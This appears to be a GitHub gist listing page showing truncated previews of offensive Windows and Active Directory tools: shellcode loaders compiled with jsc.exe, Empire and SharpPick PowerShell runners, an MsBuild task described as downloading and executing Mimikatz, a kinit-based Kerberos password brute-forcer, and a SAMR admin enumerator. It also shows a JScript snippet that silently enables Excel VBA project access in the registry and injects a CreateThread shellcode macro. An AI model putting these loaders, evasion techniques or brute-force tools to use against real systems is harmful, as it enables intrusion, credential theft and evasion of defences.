Dave Hardy davehardy20
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| using RGiesecke.DllExport; | |
| namespace Export | |
| { | |
| class Test | |
| { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import System; | |
| import System.Runtime.InteropServices; | |
| import System.Reflection; | |
| import System.Reflection.Emit; | |
| import System.Runtime; | |
| import System.Text; | |
| //C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js | |
| //C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import System; | |
| import System.Runtime.InteropServices; | |
| import System.Reflection; | |
| import System.Reflection.Emit; | |
| import System.Runtime; | |
| import System.Text; | |
| //C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js | |
| //C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js | |
davehardy20
/ EmpireSCT.cs
Created
July 27, 2017 20:07
— forked from bneg/EmpireSCT.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * SharpPick aka InexorablePoSH | |
| * Description: Application to load and run powershell code via the .NET assemblies | |
| * License: 3-Clause BSD License. See Veil PowerTools Project | |
| * | |
| * This application is part of Veil PowerTools, a collection of offensive PowerShell | |
| * capabilities. Hope they help! | |
| * | |
| * This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe | |
| */ |
davehardy20
/ EmpireDLL.cs
Created
July 27, 2017 20:07
— forked from bneg/EmpireDLL.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * SharpPick aka InexorablePoSH | |
| * Description: Application to load and run powershell code via the .NET assemblies | |
| * License: 3-Clause BSD License. See Veil PowerTools Project | |
| * | |
| * This application is part of Veil PowerTools, a collection of offensive PowerShell | |
| * capabilities. Hope they help! | |
| * | |
| * This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe | |
| */ |
davehardy20
/ SharpPick.cs
Created
July 27, 2017 20:08
— forked from bneg/SharpPick.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * SharpPick aka InexorablePoSH | |
| * Description: Application to load and run powershell code via the .NET assemblies | |
| * License: 3-Clause BSD License. See Veil PowerTools Project | |
| * | |
| * This application is part of Veil PowerTools, a collection of offensive PowerShell | |
| * capabilities. Hope they help! | |
| * | |
| * This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe | |
| */ |
davehardy20
/ katz.xml
Created
July 29, 2017 07:00
Downloads Mimikatz From GitHub, Executes Inside of MsBuild.exe
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml --> | |
| <Target Name="Hello"> | |
| <SharpLauncher > | |
| </SharpLauncher> | |
| </Target> | |
| <UsingTask | |
| TaskName="SharpLauncher" | |
| TaskFactory="CodeTaskFactory" |
davehardy20
/ kinit_brute.sh
Created
July 30, 2017 14:01
— forked from ropnop/kinit_brute.sh
A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Title: kinit_brute.sh | |
| # Author: @ropnop | |
| # Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller | |
| # The script configures the realm and KDC for you based on the domain provided and the domain controller | |
| # Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf | |
| # Only tested with Heimdal kerberos (error messages might be different for MIT clients) | |
| # Note: this *will* lock out accounts if a domain lockout policy is set. Be careful |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var objExcel = new ActiveXObject("Excel.Application"); | |
| objExcel.Visible = false; | |
| var WshShell = new ActiveXObject("WScript.Shell"); | |
| var Application_Version = objExcel.Version;//Auto-Detect Version | |
| var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; | |
| WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); | |
| var objWorkbook = objExcel.Workbooks.Add(); | |
| var xlmodule = objWorkbook.VBProject.VBComponents.Add(1); | |
| // Sample Shell Code Execution Documented Here: https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/ | |
| var strCode = 'Private Declare Function CreateThread Lib "kernel32" (ByVal Npdrhkbff As Long, ByVal Drcunuy As Long, ByVal Ache As Long, Wiquwzp As Long, ByVal Ltdplqkqj As Long, Xsawbea As Long) As Long\n'; |
davehardy20
/ lookupadmins.py
Created
August 2, 2017 18:27
— forked from ropnop/lookupadmins.py
Python script using Impacket to enumerate local administrators over SAMR
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # | |
| # Title: lookupadmins.py | |
| # Author: @ropnop | |
| # Description: Python script using Impacket to query members of the builtin Administrators group through SAMR | |
| # Similar in function to Get-NetLocalGroup from Powerview | |
| # Won't work against Windows 10 Anniversary Edition unless you already have local admin | |
| # See: http://www.securityweek.com/microsoft-experts-launch-anti-recon-tool-windows-10-server-2016 | |
| # | |
| # Original Impacket scripts written by @agsolino and available here: https://github.com/CoreSecurity/impacket |